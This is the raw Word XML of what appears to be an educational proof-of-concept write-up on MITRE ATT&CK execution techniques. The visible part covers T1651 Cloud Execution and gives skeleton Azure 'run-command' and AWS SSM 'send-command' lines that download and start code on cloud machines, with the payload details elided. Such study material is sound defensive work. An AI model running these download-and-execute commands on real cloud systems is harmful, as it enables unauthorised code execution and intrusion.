    <w:p w14:paraId="0C9DA1C8" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="259" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16542E01" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>T1651 - Cloud Execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="007BB8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3675A69E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="172"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Azure: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A85D576" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="359" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AF671" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2153"/>
          <w:tab w:val="center" w:pos="5973"/>
        </w:tabs>
        <w:spacing w:after="171"/>
        <w:ind w:left="-15" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">az vm run-command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">invoke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--scripts "Invoke-WebRequest ...; Start-Process ..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD4071" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="172"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508DFE66"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spacing w:after="121" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265769A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="172C51"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="172C51"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="172C51"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="172C51"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4249"/>
        </w:tabs>
        <w:spacing w:after="536" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>aws ssm send-command --parameters 'commands</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"Invoke-WebRequest ..."]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983F333" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615ABBE" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion: Why This PoC Is Valuable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A650C" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="172"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstrates 3 realistic execution paths used in real-world attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B37313" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="172"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps understand how common tools are abused (Word, PowerShell, Cloud APIs). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73526116" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="172"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Aligns with industry-standard MITRE ATT&amp;CK. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A638A3F" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="172"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Covers endpoint, human, and cloud-based vectors — giving a broad view of attacker behavior. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB531A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FD97A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="186" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Sources (as required): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6C64E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:color w:val="1B8AF9"/>
            <w:u w:val="single" w:color="1A8AF9"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1059/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:color w:val="404040"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="272285E4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:color w:val="1B8AF9"/>
            <w:u w:val="single" w:color="1A8AF9"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1204/002/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:color w:val="404040"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7277305A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:color w:val="1B8AF9"/>
            <w:u w:val="single" w:color="1A8AF9"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1651/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="404040"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6186D332" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="261" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C611197" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007D1E15">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1488" w:right="960"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51D91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC90D3BC"/>
    <w:lvl w:ilvl="0" w:tplc="8C1466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C83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289E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F897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04C0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52A4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00EC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244D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181F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2B5DE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED60DD6"/>
    <w:lvl w:ilvl="0" w:tplc="15863A0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F90FD2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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260C52">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>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743A36">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>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82CED8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>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0C80C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>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26C79C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>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4A4F12">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>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E0089C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>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3216890"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="667E6808"/>
    <w:lvl w:ilvl="0" w:tplc="903CF660">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4EC9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34AECD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2E4EB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F4DD9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14AEB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686C1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60AB9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74847C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9FD1BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B948B488"/>
    <w:lvl w:ilvl="0" w:tplc="5204D1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5A06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F401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B21A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E6CD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E05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9409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0A2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204C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9D5DED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35C2DC98"/>
    <w:lvl w:ilvl="0" w:tplc="2C005398">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A0A05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90593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1C485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9EF80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2656D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1A982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3CA606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6300B1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B63577B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="965602F8"/>
    <w:lvl w:ilvl="0" w:tplc="66D2E8B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92A0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B81E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4C429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46737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B29C2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C86F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A49BE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EA67F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24D3EF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9420340E"/>
    <w:lvl w:ilvl="0" w:tplc="848EB6D8">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B2603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4A622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6E6D25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F5C0CE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A00FB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F02C5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18079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4B6384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8AB00F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD6841EC"/>
    <w:lvl w:ilvl="0" w:tplc="6F406BF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="705"/>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A0CC2CAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14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1592D9CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="21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2FF8B44A">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29F290C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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E12AA2C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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FC9ECAF8">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356A7B92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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2F3C6B1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="64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abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E491CA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05BC5A70"/>
    <w:lvl w:ilvl="0" w:tplc="E44A83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D20128">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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CE4A68">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="19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EA5130">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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722D8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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1861F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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88D994">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="48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AC3242">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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AA2040">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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90078557">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1490904430">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="77875240">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="281883792">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2135361824">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1628782162">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="666902355">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1412464561">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2030179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15"/>
    <w:rsid w:val="007D1E15"/>
    <w:rsid w:val="00BD7DF8"/>
    <w:rsid w:val="00F0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E214"/>
  <w15:docId w15:val="{73002901-C2A1-4241-AE93-53FE6307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9"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20" w:line="259" w:lineRule="auto"/>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059/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1651/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T165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ttack.mitre.org/tactics/TA0002/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1651/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/0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ttack.mitre.org/tactics/TA0002/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0002/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1651/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1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cp:lastModifiedBy>UMA BANNE</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-08T01:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T01:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>